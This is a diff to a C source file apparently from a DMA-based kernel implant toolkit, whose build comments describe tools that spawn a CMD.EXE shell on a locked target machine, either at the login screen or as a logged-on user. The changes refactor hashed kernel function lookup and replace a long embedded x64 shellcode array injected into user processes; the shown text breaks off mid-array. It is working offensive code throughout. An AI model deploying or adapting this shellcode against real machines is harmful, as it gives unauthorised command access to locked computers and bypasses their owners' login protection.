-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM /D_WIN7_COMPAT wx64_pscreate.c
// ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
// shellcode64.exe -o wx64_pscmd.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET! \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nonly work if the target system is locked and the login screen is\nvisible. If it takes time waiting - then please touch any key on\nthe target system. If the utility fails multiple times, please\ntry wx64_pscreate instead. \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n================================================================\n"
//
// ALTERNATIVELY (wx64_pscmd_user):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER /D_WIN7_COMPAT wx64_pscreate.c
// ml64 wx64_common_a.asm /Fewx64_pscmd_user.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
// shellcode64.exe -o wx64_pscmd_user.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE AS USER ON TARGET! \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nwill spawn a cmd.exe in the context of a random logged on user.\nThis will work even though the computer may be locked. If this\nutility fails multiple times, please try wx64_pscreate instead. \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n================================================================\n"
#include "wx64_common.h"
@@ -213,9 +213,6 @@ typedef struct tdKERNEL_FUNCTIONS2 {
_In_ ULONG AllocationType,
_In_ ULONG Protect
);
- NTSTATUS(*ZwClose)(
- _In_ HANDLE Handle
- );
NTSTATUS(*ZwOpenProcess)(
_Out_ PHANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
@@ -227,43 +224,45 @@ typedef struct tdKERNEL_FUNCTIONS2 {
VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2 fnk2)
{
- QWORD FUNC2[][2] = {
- { &fnk2->IoAllocateMdl, H_IoAllocateMdl },
- { &fnk2->KeInitializeApc, H_KeInitializeApc },
- { &fnk2->KeInsertQueueApc, H_KeInsertQueueApc },
- { &fnk2->KeStackAttachProcess, H_KeStackAttachProcess },
- { &fnk2->KeUnstackDetachProcess, H_KeUnstackDetachProcess },
- { &fnk2->MmAllocateContiguousMemory, H_MmAllocateContiguousMemory },
- { &fnk2->MmFreeContiguousMemory, H_MmFreeContiguousMemory },
- { &fnk2->MmMapLockedPagesSpecifyCache, H_MmMapLockedPagesSpecifyCache },
- { &fnk2->MmProbeAndLockPages, H_MmProbeAndLockPages },
- { &fnk2->ObDereferenceObject, H_ObDereferenceObject },
- { &fnk2->PsGetProcessImageFileName, H_PsGetProcessImageFileName },
- { &fnk2->PsLookupProcessByProcessId, H_PsLookupProcessByProcessId },
- { &fnk2->PsLookupThreadByThreadId, H_PsLookupThreadByThreadId },
- { &fnk2->RtlCreateUserThread, H_RtlCreateUserThread },
- { &fnk2->strnlen, H_strnlen },
- { &fnk2->ZwAllocateVirtualMemory, H_ZwAllocateVirtualMemory },
- { &fnk2->ZwClose, H_ZwClose },
- { &fnk2->ZwOpenProcess, H_ZwOpenProcess }
- };
- for(QWORD j = 0; j < (sizeof(FUNC2) / sizeof(QWORD[2])); j++) {
- *(PQWORD)FUNC2[j][0] = PEGetProcAddressH(qwNtosBase, (DWORD)FUNC2[j][1]);
+ DWORD i = 0, NAMES[18];
+ NAMES[i++] = H_IoAllocateMdl;
+ NAMES[i++] = H_KeInitializeApc;
+ NAMES[i++] = H_KeInsertQueueApc;
+ NAMES[i++] = H_KeStackAttachProcess;
+ NAMES[i++] = H_KeUnstackDetachProcess;
+ NAMES[i++] = H_MmAllocateContiguousMemory;
+ NAMES[i++] = H_MmFreeContiguousMemory;
+ NAMES[i++] = H_MmMapLockedPagesSpecifyCache;
+ NAMES[i++] = H_MmProbeAndLockPages;
+ NAMES[i++] = H_ObDereferenceObject;
+ NAMES[i++] = H_PsGetProcessImageFileName;
+ NAMES[i++] = H_PsLookupProcessByProcessId;
+ NAMES[i++] = H_PsLookupThreadByThreadId;
+ NAMES[i++] = H_RtlCreateUserThread;
+ NAMES[i++] = H_strnlen;
+ NAMES[i++] = H_ZwAllocateVirtualMemory;
+ NAMES[i++] = H_ZwOpenProcess;
+ while(i) {
+ i--;
+ *((PQWORD)fnk2 + i) = (QWORD)PEGetProcAddressH(qwNtosBase, NAMES[i]);
}
}
//----------------------------------------------------------------------------------------------------------
-
-NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2 fnk2, PBYTE pb, QWORD qwAddrConsoleBuffer)
+// USER MODE SHELLCODE ASSIGNMENT BELOW:
+//----------------------------------------------------------------------------------------------------------
+#ifndef _EXEC_USER_EXTERNAL
+VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWORD pcb)
{
- unsigned char wx64_exec_user_bin[] = {
+ UNREFERENCED_PARAMETER(pk);
+ BYTE wx64_exec_user_bin[] = {
0xb0, 0x00, 0xb2, 0x01, 0x48, 0x8d, 0x0d, 0x49, 0x00, 0x00, 0x00, 0xf0,
0x0f, 0xb0, 0x11, 0x75, 0x42, 0x48, 0x8d, 0x0d, 0xe8, 0xff, 0xff, 0xff,
0x48, 0x81, 0xe1, 0x00, 0xf0, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x14, 0x25,
0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18,
0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x12, 0x48, 0x8b, 0x12, 0x48, 0x8b,
0x52, 0x20, 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83,
- 0xec, 0x20, 0xe8, 0x69, 0x04, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
+ 0xec, 0x20, 0xe8, 0xe1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
0x00, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
0x24, 0x10, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x48, 0x63, 0x41, 0x3c, 0x4c,
0x8b, 0xc9, 0x8b, 0xf2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00,
@@ -277,117 +276,130 @@ NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In
0x24, 0x08, 0x48, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x8b, 0x7c, 0x24, 0x18,
0xc3, 0x41, 0x0f, 0xb7, 0x0c, 0x4b, 0x8b, 0x04, 0x8b, 0x49, 0x03, 0xc1,
0xeb, 0xe3, 0xcc, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
- 0x81, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89,
- 0x08, 0x39, 0x8b, 0x98, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x98,
- 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x68, 0xff, 0x53, 0x08, 0x48, 0x8b,
- 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x70, 0xff, 0x53, 0x08,
- 0x48, 0x8b, 0x4b, 0x78, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x83, 0x80, 0x00,
- 0x00, 0x00, 0x48, 0xb9, 0xac, 0xda, 0x37, 0x13, 0x00, 0x22, 0xda, 0xfe,
- 0x48, 0x89, 0x08, 0x48, 0x8b, 0x83, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89,
- 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24,
- 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x70, 0xbe,
- 0x68, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x8b, 0xd6, 0x8d, 0x4e, 0xd8,
- 0xff, 0x53, 0x38, 0x48, 0x8b, 0xf8, 0x89, 0x30, 0x33, 0xf6, 0xc7, 0x40,
- 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13, 0x48, 0x39, 0xb2, 0x08,
- 0x01, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x89, 0x48,
- 0x58, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x89, 0x48, 0x50, 0x48, 0x8b, 0x4b,
- 0x70, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b, 0x13, 0x48, 0x8d, 0x44, 0x24,
- 0x50, 0x48, 0x89, 0x44, 0x24, 0x48, 0x45, 0x33, 0xc9, 0x48, 0x89, 0x7c,
- 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x74, 0x24, 0x38, 0x33, 0xc9,
- 0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0x74, 0x24, 0x30, 0x89,
- 0x44, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff,
- 0x53, 0x18, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x44, 0x24, 0x50, 0x48,
- 0x89, 0x83, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x39, 0xb0,
- 0x08, 0x01, 0x00, 0x00, 0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff,
- 0x53, 0x08, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x53,
- 0x40, 0x4c, 0x8d, 0x5c, 0x24, 0x70, 0x8b, 0xc6, 0x49, 0x8b, 0x5b, 0x10,
- 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0xe3, 0x5f, 0xc3, 0xcc, 0xcc, 0xcc,
- 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
- 0xfa, 0x48, 0x8b, 0xd9, 0xba, 0xfb, 0x97, 0xfd, 0x0f, 0xe8, 0x22, 0xfe,
- 0xff, 0xff, 0xba, 0x80, 0x8f, 0x0c, 0x17, 0x48, 0x89, 0x07, 0x48, 0x8b,
- 0xcb, 0xe8, 0x12, 0xfe, 0xff, 0xff, 0xba, 0x72, 0xfe, 0xb3, 0x16, 0x48,
- 0x89, 0x47, 0x08, 0x48, 0x8b, 0xcb, 0xe8, 0x01, 0xfe, 0xff, 0xff, 0xba,
- 0x6b, 0xd0, 0x2b, 0xca, 0x48, 0x89, 0x47, 0x10, 0x48, 0x8b, 0xcb, 0xe8,
- 0xf0, 0xfd, 0xff, 0xff, 0xba, 0x74, 0xab, 0x30, 0xac, 0x48, 0x89, 0x47,
- 0x18, 0x48, 0x8b, 0xcb, 0xe8, 0xdf, 0xfd, 0xff, 0xff, 0xba, 0x66, 0x19,
- 0xda, 0x75, 0x48, 0x89, 0x47, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0xce, 0xfd,
- 0xff, 0xff, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0x48, 0x89, 0x47, 0x28, 0x48,
- 0x8b, 0xcb, 0xe8, 0xbd, 0xfd, 0xff, 0xff, 0xba, 0xf6, 0xea, 0xba, 0x5c,
- 0x48, 0x89, 0x47, 0x30, 0x48, 0x8b, 0xcb, 0xe8, 0xac, 0xfd, 0xff, 0xff,
- 0xba, 0x16, 0x65, 0xfa, 0x10, 0x48, 0x89, 0x47, 0x38, 0x48, 0x8b, 0xcb,
- 0xe8, 0x9b, 0xfd, 0xff, 0xff, 0xba, 0xb0, 0x49, 0x2d, 0xdb, 0x48, 0x89,
- 0x47, 0x40, 0x48, 0x8b, 0xcb, 0xe8, 0x8a, 0xfd, 0xff, 0xff, 0xba, 0x1f,
- 0x79, 0x0a, 0xe8, 0x48, 0x89, 0x47, 0x48, 0x48, 0x8b, 0xcb, 0xe8, 0x79,
- 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48, 0x89, 0x47, 0x50,
- 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28,
- 0x48, 0x8b, 0xc1, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x90,
- 0x00, 0x00, 0x00, 0xff, 0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f,
- 0x81, 0x7c, 0x24, 0x30, 0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01,
- 0x00, 0x00, 0x00, 0x8b, 0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc,
- 0x48, 0x89, 0x5c, 0x24, 0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9,
- 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xba, 0x00,
- 0x00, 0x00, 0xbe, 0x00, 0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5,
- 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xa5, 0x00, 0x00, 0x00, 0x48,
- 0x8b, 0x83, 0x80, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x8b, 0x88, 0x00, 0x00,
- 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10, 0x41, 0x8b,
- 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2, 0xff, 0x07,
- 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x68, 0x77, 0x08,
- 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33, 0xc0, 0x49,
- 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0xff,
- 0x53, 0x48, 0x85, 0xc0, 0x74, 0x56, 0x48, 0x8b, 0x8b, 0x88, 0x00, 0x00,
- 0x00, 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83,
- 0xbb, 0x98, 0x00, 0x00, 0x00, 0x00, 0x74, 0x3c, 0x48, 0x8b, 0xcb, 0xe8,
- 0x2c, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x23, 0xb9, 0x0a, 0x00, 0x00,
- 0x00, 0xff, 0x53, 0x50, 0x48, 0x8b, 0x8b, 0x88, 0x00, 0x00, 0x00, 0x48,
- 0x8b, 0x83, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x49, 0x08, 0x48, 0x2b,
- 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xc8, 0x83, 0xbb, 0x98, 0x00, 0x00,
- 0x00, 0x00, 0x0f, 0x85, 0x4b, 0xff, 0xff, 0xff, 0x48, 0x8b, 0xcb, 0xe8,
- 0xe8, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0x5c, 0x24, 0x48, 0x48, 0x83, 0xc4,
- 0x30, 0x5e, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9,
- 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0x85, 0x00,
- 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xc6, 0xfe, 0xff, 0xff, 0x85, 0xc0,
- 0x74, 0x79, 0x48, 0x8b, 0x93, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8b,
- 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x42, 0x10, 0x48, 0x39, 0x41, 0x08,
- 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00, 0x00, 0xff, 0x53, 0x50, 0xeb, 0x4a,
- 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d, 0x51, 0x68, 0x48, 0x83, 0x64, 0x24,
- 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0x48, 0x8b, 0x4b, 0x60, 0x25,
- 0xff, 0x07, 0x00, 0x00, 0x41, 0x81, 0xe0, 0xff, 0x07, 0x00, 0x00, 0x48,
- 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72, 0x06, 0x41, 0xb8, 0x00, 0x08, 0x00,
- 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53, 0x58, 0x85, 0xc0, 0x74, 0x1c, 0x48,
- 0x8b, 0x8b, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01,
- 0x41, 0x10, 0x83, 0xbb, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x7b,
- 0xff, 0xff, 0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x39, 0xfc, 0xff, 0xff, 0x48,
- 0x83, 0xc4, 0x30, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
- 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48,
- 0x8b, 0xfa, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02,
- 0x4c, 0xe8, 0x7e, 0xfb, 0xff, 0xff, 0xba, 0xa0, 0x00, 0x00, 0x00, 0x8d,
- 0x4a, 0xa0, 0xff, 0xd0, 0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48,
- 0x8b, 0xf0, 0x48, 0x89, 0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf,
- 0xe8, 0x1f, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08,
- 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x84, 0x00, 0x00, 0x00, 0x48, 0x83,
- 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24,
- 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21, 0x95, 0xef, 0xdf, 0x32,
- 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00, 0xbb, 0x00, 0x08, 0x00,
- 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb, 0x48, 0x8b, 0x06, 0x48,
- 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89, 0x8e, 0x80, 0x00, 0x00,
- 0x00, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00, 0x10,
- 0x00, 0x00, 0x48, 0x89, 0x86, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89, 0x11,
- 0x48, 0x8d, 0x4e, 0x78, 0x48, 0x8b, 0x86, 0x88, 0x00, 0x00, 0x00, 0x48,
- 0x89, 0x10, 0x48, 0x8d, 0x56, 0x60, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56,
- 0x70, 0x44, 0x8b, 0xcb, 0x48, 0x8d, 0x4e, 0x68, 0x4c, 0x8d, 0x44, 0x24,
- 0x30, 0xff, 0x56, 0x10, 0x89, 0xbe, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b,
- 0xce, 0xe8, 0xb2, 0xfb, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x10, 0x48, 0x8b,
- 0xce, 0xe8, 0x42, 0xfb, 0xff, 0xff, 0x48, 0x8b, 0xce, 0xff, 0x56, 0x40,
- 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00, 0x00,
- 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d, 0x05,
- 0x44, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b, 0xce,
- 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24, 0x28,
- 0x00, 0x4c, 0x8d, 0x05, 0x40, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20,
- 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48,
- 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83, 0xc4,
- 0x50, 0x5f, 0xc3
+ 0x41, 0x78, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89, 0x08, 0x39, 0x8b,
+ 0x88, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x88, 0x00, 0x00, 0x00,
+ 0x48, 0x8b, 0x4b, 0x58, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x50, 0xff,
+ 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b,
+ 0x68, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x43, 0x70, 0x48, 0xb9, 0xac, 0xda,
+ 0x37, 0x13, 0x00, 0x22, 0xda, 0xfe, 0x48, 0x89, 0x08, 0x48, 0x8b, 0x43,
+ 0x78, 0x48, 0x89, 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc,
+ 0x40, 0x53, 0x48, 0x83, 0xec, 0x70, 0xba, 0x68, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xd9, 0x8d, 0x4a, 0xd8, 0xff, 0x53, 0x30, 0xc7, 0x00, 0x68, 0x00,
+ 0x00, 0x00, 0xc7, 0x40, 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13,
+ 0x48, 0x83, 0xba, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b,
+ 0x4b, 0x60, 0x48, 0x89, 0x48, 0x58, 0x48, 0x8b, 0x4b, 0x68, 0x48, 0x89,
+ 0x48, 0x50, 0x48, 0x8b, 0x4b, 0x60, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b,
+ 0x13, 0x48, 0x8d, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x4c, 0x24, 0x48, 0x45,
+ 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x83,
+ 0x64, 0x24, 0x38, 0x00, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00,
+ 0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44,
+ 0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff, 0x53, 0x18, 0x85, 0xc0, 0x74,
+ 0x26, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x8b, 0x80, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff, 0x53, 0x08, 0xb8, 0x01,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xe9, 0xc7,
+ 0x40, 0xc8, 0xfb, 0x97, 0xfd, 0x0f, 0xc7, 0x40, 0xcc, 0x80, 0x8f, 0x0c,
+ 0x17, 0x48, 0x8d, 0x7a, 0x48, 0xc7, 0x40, 0xd0, 0x72, 0xfe, 0xb3, 0x16,
+ 0x48, 0x8d, 0x70, 0xec, 0xc7, 0x40, 0xd4, 0x6b, 0xd0, 0x2b, 0xca, 0xbb,
+ 0x09, 0x00, 0x00, 0x00, 0xc7, 0x40, 0xd8, 0x74, 0xab, 0x30, 0xac, 0xc7,
+ 0x40, 0xdc, 0xfa, 0x97, 0x02, 0x4c, 0xc7, 0x40, 0xe0, 0x16, 0x65, 0xfa,
+ 0x10, 0xc7, 0x40, 0xe4, 0xb0, 0x49, 0x2d, 0xdb, 0xc7, 0x40, 0xe8, 0x1f,
+ 0x79, 0x0a, 0xe8, 0x48, 0x8d, 0x76, 0xfc, 0x48, 0x8b, 0xcd, 0x8b, 0x16,
+ 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0xeb, 0xfd, 0xff, 0xff, 0x48, 0x89, 0x07,
+ 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b,
+ 0x6c, 0x24, 0x68, 0x48, 0x8b, 0x74, 0x24, 0x70, 0x48, 0x83, 0xc4, 0x50,
+ 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0xc1, 0x48,
+ 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x80, 0x00, 0x00, 0x00, 0xff,
+ 0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f, 0x81, 0x7c, 0x24, 0x30,
+ 0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x8b,
+ 0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00, 0xbe, 0x00,
+ 0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5, 0xff, 0xff, 0xff, 0x85,
+ 0xc0, 0x0f, 0x84, 0x96, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x43, 0x70, 0x4c,
+ 0x8b, 0x4b, 0x78, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10,
+ 0x41, 0x8b, 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2,
+ 0xff, 0x07, 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x58,
+ 0x77, 0x08, 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33,
+ 0xc0, 0x49, 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0xff, 0x53, 0x38, 0x85, 0xc0, 0x74, 0x4d, 0x48, 0x8b, 0x4b, 0x78,
+ 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83, 0xbb,
+ 0x88, 0x00, 0x00, 0x00, 0x00, 0x74, 0x36, 0x48, 0x8b, 0xcb, 0xe8, 0x35,
+ 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x1d, 0xb9, 0x0a, 0x00, 0x00, 0x00,
+ 0xff, 0x53, 0x40, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x8b, 0x43, 0x70, 0x48,
+ 0x8b, 0x49, 0x08, 0x48, 0x2b, 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xce,
+ 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x5a, 0xff, 0xff,
+ 0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x5b, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c,
+ 0x24, 0x48, 0x48, 0x83, 0xc4, 0x30, 0x5e, 0xc3, 0x40, 0x53, 0x48, 0x83,
+ 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9,
